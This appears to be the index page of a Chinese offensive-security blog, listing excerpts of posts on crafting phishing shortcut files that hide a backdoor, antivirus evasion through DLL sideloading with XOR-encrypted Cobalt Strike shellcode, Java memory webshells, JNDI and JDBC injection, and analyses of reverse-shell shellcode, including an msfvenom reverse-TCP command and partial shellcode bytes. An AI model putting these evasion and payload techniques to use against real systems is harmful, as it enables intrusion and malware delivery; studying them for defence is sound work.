钓鱼样本的制作手段
2025-05-09 424 字 1 分钟

钓鱼样本的制作手段

下面是成品的钓鱼样本,先分析分析与普通的快捷方式有什么不同 ​​ 值得注意的是,其目标一栏为灰色,并且指向的是explorer.exe,图标也是word文档的图标,大小有300多KB(远超原本快捷方式1kb的大小),即使打开文件所在位置,也是explorer的文件 ​​ 但是实际点击运行,会运行隐藏的后门 ​​ 使用010editor去看二进制,可以发现struct StringData COMMAND_LINE_ARGUMENTS处先填充了大量的20 00造成空白,最后才是接__MACOS\WPS.com ​​ 后续测试发现struct StringData COMMAND_LINE_ARG
免杀的实际测试
2025-05-09 457 字 2 分钟

免杀的实际测试

试了一圈还是简单的白加黑效果最好,首先随便找一个带有正规数字签名的程序 ​​ 判断其内加载的dll,先将原本有的DLL给拖出去,然后运行,下面就可以尝试去劫持HookSigntool.dll ​​ 使用IDA逆向分析HookSigntool的导出函数 ​​ ​​ 然后自行实现编写一个DLL,导出函数调用约定参数需要跟HookSigntool的导出函数一致,在DLL_PROCESS_ATTACH中其实现自己的shellcode加载,这里我原本就是用的原版的cs的stage shellcode,不过被特征了,先进行异或加密,在writeprocessmemory之前再进行异或解密 12345678
Heaven's Gate的学习
2025-04-19 1.9k 字 9 分钟

Heaven's Gate的学习

天堂之门(Heaven’s Gate)是一种特殊的代码注入技术,主要用于在32位进程中执行64位代码,或者绕过 某些安全机制。这项技术得名于Windows系统中一个特殊的调用门机制。 关于windows系统32位程序在64位系统上的运行机制 在64位Windows系统上运行32位程序时,系统通过一套称为WOW64(Windows-on-Windows 64-bit)的兼容层机制实现无缝运行。 API调用转换:当32位程序调用Windows API时,WOW64将32位API调用动态转换为对应的64位API(例如将kernel32.dll重定向到kernel64.dll)。 注册表重定向:32
内存马的一些学习
2025-04-12 3k 字 14 分钟

内存马的一些学习

Java EE架构内存马包括Listener型,Filter型,Servlet型内存马,实现了java EE规范的web服务器就包括上述三种概念 各请求处理顺序如下: 1234567891011121314151617181920212223请求到达│├─ (1) Listener(监听请求/Session创建事件)│ ├─ ServletRequestListener.requestInitialized()│ └─ HttpSessionListener.sessionCreated()(如创建新Session)│├─ (2) Filter链(前置处理)│ ├─ Filter1
反序列化payload缩小技术
2025-04-12 2.5k 字 12 分钟

反序列化payload缩小技术

测试环境JDK 8u65+CB 1.9.2打templatesImpl加载字节码 添加pom依赖 1234567<dependencies> <dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId> <version>1.9.2</version> </dependency></dependencies
cobalt strike后门木马shellcode分析
2025-02-10 5k 字 29 分钟

cobalt strike后门木马shellcode分析

其reversetcp的shellcode如下,主要是看和msf的有什么区别 1unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40
JNDI注入绕过高版本限制探究
2025-02-10 2.3k 字 9 分钟

JNDI注入绕过高版本限制探究

限制内容: SQLJDK 6u141、7u131、8u121之后:增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。JDK 6u211、7u201、8u191之后:增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给
JDBC反序列化漏洞探究
2025-02-08 863 字 3 分钟

JDBC反序列化漏洞探究

什么是JDBC反序列化漏洞? JDBC在连接目标服务时,存在反序列目标服务传回的数据的机制,如果目标服务是恶意,可以精心构造这一部分数据,那么发起JDBC连接的客户端就会受到攻击,所以该部分的攻击点是可以控制连接目标的地址,指向攻击者构造的服务器地址,而不是控制连接数据 这里注意几个概念,JDBC是是Java提供对数据库进行连接抽象API接口,具体的内容是不同的数据库提供商实现的 JDBC反序列机制探究 相关依赖 SQL mysql mysql-connector-java 8.0.19 commons-collections commons-collections 3.2.1 客
一个简单的安卓flutter逆向尝试
2025-02-06 3.3k 字 14 分钟

一个简单的安卓flutter逆向尝试

源自某次CTF,运行效果如下 ​​ ​​ ​​ 一个flutter应用,思考提取flutter应用源码,记得下面这个工具可以 https://github.com/worawit/blutter 该应用是否可以抽取dart源码以及以及是否能直接绕过反逆向技术和原理有待探究 blutter环境配置参考: 首先我们需要从GitHub上克隆blutter项目: 1git clone https://github.com/worawit/blutter.git 然后进入blutter目录执行初始化环境的脚本: 12cd blutter/python scripts/init_env_win.py
MSF的shellcode分析
2025-02-06 2.7k 字 15 分钟

MSF的shellcode分析

基本分析 生成指令: 1msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=1111 -f c 生成结果: 12345678910111213141516171819202122232425unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50""\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26""\x31
backtop